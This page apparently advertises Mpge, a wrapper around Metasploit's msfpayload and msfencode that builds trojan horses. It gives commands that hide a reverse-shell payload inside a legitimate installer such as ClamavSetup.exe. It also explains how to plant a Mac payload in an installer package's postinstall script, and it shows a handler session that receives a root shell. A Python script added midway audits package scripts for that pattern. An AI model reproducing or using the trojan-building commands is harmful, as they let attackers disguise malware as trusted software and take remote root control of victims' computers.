Mpge – a wrapper of msfpayload and msfencode of Metasploit

Mpge is a wrapper for msfpayload and msfencode from Metasploit. It can be used with BackTrack and BackBox. This wrapper creates trojan horses for Microsoft Windows, Linux and Mac OS X Panther, Tiger and Leopard. For Mac OS X, after you create the reverse shell you need to insert it into a package with Iceberg.dmg (Package Maker). It is possible to create .dmg files with DropDMG. I later tried this program between two virtual machines: the first a real Mac OS X, the second a virtual Windows XP. Before that I used this program between two real Mac OS X machines: the first was a MacBook (black) and the second an iBook G4 PowerPC with OS X Tiger. These two machines were connected on a LAN (intranet). The first Mac (black) was listening, waiting for the reverse shell. The second Mac received a package (.pkg or .dmg file); when the user clicked on the file and entered the root password, the reverse shell was activated. The first Mac received the reverse shell with root privileges.

Features

README

The script mpge.sh is the wrapper, while metrevshell443.rc, vncrevshell.rc, osxrev.rc and linux.rc are the .rc files that mpge.sh uses to start the reverse shell and the VNC reverse shell for Microsoft Windows. osxrev.rc is the file that starts the reverse shell for Mac OS X, and linux.rc is the file that starts the reverse shell for Linux.

To create the trojan horse you can use the script and insert the IP address and port. Before that you need to go inside the script and insert the original file that you want to use. For example, if you want to use the file ClamavSetup.exe you insert its name in this line of the script:

msfpayload windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$porta R | msfencode -t exe -e x86/shikata_ga_nai -x ClamavSetup.exe -o ClamavSetup1.exe

This creates a file named ClamavSetup1.exe, and this is the trojan horse. The file package per mac.doc is a document that explains how to create these packages for Mac OS X.

Use the script evil.sh with the reverse shell mac2 when creating the package, as indicated in the document package per mac.doc.

Dropdmg-3.1.2.dmg and Iceberg.dmg are the programs that create the .pkg and .dmg files for Mac OS X.

Creating the trojan horse for Mac OS X and Linux:

For Mac:

To create the reverse shell for Mac use this syntax:

msfpayload osx/x86/shell_reverse_tcp LHOST=$ip LPORT=$porta X > mac2

chmod +x mac2

For Linux:

msfpayload linux/x86/shell/reverse_tcp LHOST=$ip LPORT=$porta X > linuxrev

chmod +x linuxrev

The encoding x86/shikata_ga_nai is used for Microsoft Windows; for Mac and Linux it is of course not necessary.

To create a package for Mac OS X read package per mac.doc:

Use the script evil.sh and the reverse shell mac2 when creating the package, as indicated in the document package per mac.doc. In the Scripts tab of Iceberg (Package Maker) we select the Script Directory where we placed our post-install files (mac2) and we select the script evil.sh as the postinstall script. Now we click the Build button at the top left to build our .pkg file. We place the file in a DMG on a share, on a USB stick or any other place from which our target will execute the installer, thinking it is a valid package. We prepare our attacking machine in Metasploit to receive the shells that will come from the execution of the trojanned package, and then we wait for the connections.
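The packaging step above is the point a defender can check before an installer ever runs: the Installer executes a package's postinstall script as root, so a postinstall script that marks a bundled file executable and launches it is exactly the shape described here. The following is an added example, not part of Mpge or of the document package per mac.doc. It audits the scripts directory of an unpacked .pkg, flags install-phase scripts that reference or execute files shipped beside them, and reports Mach-O binaries sitting in that directory. The directory layout, the file names (postinstall, mac2) and the sample script contents are constructed for the demonstration.

```python
"""Audit the scripts directory of an unpacked Mac OS X installer package.

Added example (not Mpge's code). Flags the pattern the page describes: a
postinstall script that chmods and runs a payload binary bundled with it.
"""
import os
import re
import stat
import tempfile

# Scripts the Installer runs automatically, as root, during installation.
SCRIPT_NAMES = {"preinstall", "postinstall", "preupgrade", "postupgrade"}

# Mach-O magic numbers (32/64-bit, both byte orders, and fat binaries).
MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",
    b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",
    b"\xca\xfe\xba\xbe",
}

# Lines a reviewer would question in an install script and why.
SUSPICIOUS = [
    (re.compile(r"\bchmod\s+\+x\b"), "marks a bundled file executable"),
    (re.compile(r'\$\(dirname\s+"?\$0"?\)/|(^|\s)\./'),
     "references a file shipped alongside the script"),
    (re.compile(r"&\s*$|\bnohup\b"), "runs a command in the background"),
]


def is_macho(path):
    """True if the file starts with a Mach-O magic number."""
    with open(path, "rb") as fh:
        return fh.read(4) in MACHO_MAGICS


def audit_script(name, text):
    """Return a finding for every non-comment line matching SUSPICIOUS."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for pattern, reason in SUSPICIOUS:
            if pattern.search(stripped):
                findings.append({"file": name, "line": lineno,
                                 "reason": reason, "text": stripped})
    return findings


def audit_scripts_dir(path):
    """Audit every file in a package's scripts directory."""
    findings = []
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        if not os.path.isfile(full):
            continue
        if name in SCRIPT_NAMES:
            with open(full, "r", errors="replace") as fh:
                findings.extend(audit_script(name, fh.read()))
        elif is_macho(full):
            findings.append({"file": name, "line": 0, "text": "",
                             "reason": "Mach-O executable bundled in scripts directory"})
        elif os.stat(full).st_mode & stat.S_IXUSR:
            findings.append({"file": name, "line": 0, "text": "",
                             "reason": "executable non-script file bundled in scripts directory"})
    return findings


def build_sample_package(malicious=True):
    """Create a constructed scripts directory for the demonstration."""
    d = tempfile.mkdtemp(prefix="pkg-scripts-")
    if malicious:
        # Modelled on the page's description of evil.sh launching mac2.
        script = ('#!/bin/sh\n'
                  'chmod +x "$(dirname "$0")/mac2"\n'
                  '"$(dirname "$0")/mac2" &\n'
                  'exit 0\n')
        payload = os.path.join(d, "mac2")
        with open(payload, "wb") as fh:
            fh.write(b"\xce\xfa\xed\xfe" + b"\x00" * 28)  # fake Mach-O header only
        os.chmod(payload, 0o755)
    else:
        script = '#!/bin/sh\n/usr/bin/touch /tmp/installed\nexit 0\n'
    post = os.path.join(d, "postinstall")
    with open(post, "w") as fh:
        fh.write(script)
    os.chmod(post, 0o755)
    return d


if __name__ == "__main__":
    for label, flag in (("suspicious", True), ("benign", False)):
        print(f"== {label} package ==")
        for f in audit_scripts_dir(build_sample_package(flag)):
            print(f"{f['file']}:{f['line']}: {f['reason']}  {f['text']}")
```

On a real package, run `pkgutil --expand some.pkg out/` first and point `audit_scripts_dir` at `out/Scripts` (or the per-component `Scripts` directory); a benign installer rarely ships a Mach-O binary in its scripts directory, and any such finding deserves a look before the package is installed.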

Example of a reverse shell on Mac OS X:

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD osx/x86/shell_reverse_tcp
PAYLOAD => osx/x86/shell_reverse_tcp

msf exploit(handler) > set LHOST 192.168.1.103
LHOST => 192.168.1.103

msf exploit(handler) > set ExitOnSession false
ExitOnSession => false

msf exploit(handler) > exploit

[*] Handler binding to LHOST 192.168.1.103

[*] Started reverse handler
[*] Starting the payload handler...

[*] Command shell session 1 opened (192.168.1.103:4444 -> 192.168.1.120:58942)

id

uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),80(admin),20(staff)

pwd

/

uname -a

Darwin Nome Utente-computer.local 7.9.0 Darwin Kernel Version 7.9.0: Wed Mar 30 20:11:17 PST 2005; root:xnu/xnu-571.12.7.obj~1/RELEASE_PPC Power Macintosh Powerpc

Download Mpge.tgz (14.9 MB)

or read more here: http://sourceforge.net/
